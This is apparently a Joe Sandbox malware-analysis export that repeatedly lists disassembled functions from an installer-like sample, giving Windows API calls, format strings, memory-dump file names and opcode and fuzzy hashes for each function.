Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00021E00,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
